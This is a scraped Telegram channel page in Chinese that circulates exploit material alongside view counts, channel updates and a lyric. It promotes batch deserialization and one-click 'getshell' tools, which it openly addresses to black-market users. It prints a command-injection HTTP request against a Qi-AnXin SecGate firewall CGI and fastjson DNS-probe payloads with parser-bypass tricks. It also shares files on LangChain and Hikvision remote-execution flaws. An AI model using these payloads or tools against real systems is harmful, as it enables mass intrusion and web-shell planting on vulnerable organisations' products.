NEW BOT Телеграм, страница

踹哈公寓

Forwarded from 黄豆

1.79K views08:11

踹哈公寓

畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController反序列化批量检测脚本

用法
python exp.py -u url
python exp.py -f url.txt

1.82K views02:23

1.83K views02:23

TG上许多圈哥都在发的xx一键批量getshell傻瓜式工具，我也写了一个，GPT就能搓的东西，GitHub也有上一堆免费的真没必要去傻乎乎的爆金币

用法 -u 单个url
-f txt
-t指定线程，默认为50

黑产哥可能要问了，孩子shell传上去了密码是多少呢?国内漏洞我还是怕出事，就不告诉你，自己扒拉源码翻吧

🥰4

2.01K views05:06

1.96K views05:06

This media is not supported in your browser

VIEW IN TELEGRAM

❤1

1.94K views05:07

踹哈公寓

https://www.secrss.com/articles/64457

🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🤓Never let you go，it's why I did them all🤓
For a chance at least~～🎻, to live in your way🎻🎻
Love of you👿 is my most cherished thing😭😭😭😭
😡👊🏻So stay alive, bravely.
🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶🎶

Secrss

韩国加快网络空间能力建设

此举旨在推动实现2023版《国家安全战略》对网络空间领域提出的发展目标和要求，也与近日发布的新版《国家网络安全战略》相互呼应。

👍2🥴1

1.77K views12:11

踹哈公寓

Channel photo updated

00:29

踹哈公寓

Channel name was changed to «大鸟转转转酒吧»

00:29

踹哈公寓

奇安信网神SecGate 3600 A1500 防火墙存在前台命令执行漏洞

POST /cgi-bin/sysTools/sysToolsDetectNet.cgi HTTP/1.1Host: xxxxxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/plain, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequesttargetHost=|ping|

👍3❤1

1.88K views09:35

踹哈公寓

自我介绍

🤡18

1.8K views01:03

踹哈公寓

LangChain 远程代码执行漏洞(CVE-2024-28088) (1).docx

15.2 KB

1.83K views03:15

踹哈公寓

😁3

1.76K views05:14

踹哈公寓

fastjson默认配置测试版本payload

payload 1(dns请求)【fastjson>=1.2.37】

{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://§1§.{{URL}}"}}""}

1.2.37-1.2.83版本

payload 2(dns请求)【fastjson>=1.2.37】

{{"@type":"java.net.URL","val":"http://§1§.{{URL}}"}:0

1.2.37-1.2.83版本

bypass字符，\a、\n、\b、\r、\f、\t 等，十六进制编码。把字符串中的0x07以及0x0b去除，可以加在"@type":"java.net.InetSocketAddress"不影响json的解析，反之，则会造成500错误

poc2jar工具里也有json漏洞poc能做大致判断
https://github.com/f0ng/poc2jar

GitHub

GitHub - f0ng/poc2jar: Java编写，Python作为辅助依赖的漏洞验证、利用工具，添加了进程查找模块、编码模块、命令模块、常见漏洞利用GUI模块、shiro rememberMe解密模块，加快测试效率

Java编写，Python作为辅助依赖的漏洞验证、利用工具，添加了进程查找模块、编码模块、命令模块、常见漏洞利用GUI模块、shiro rememberMe解密模块，加快测试效率 - f0ng/poc2jar

❤1

2.99K viewsedited 08:01

踹哈公寓

https://mp.weixin.qq.com/s/8oNRw68bZUsK_EolchEeqA

1.91K views08:06

踹哈公寓

海康运行管理中心存在命令执行漏洞.docx

17 KB

1.87K views08:55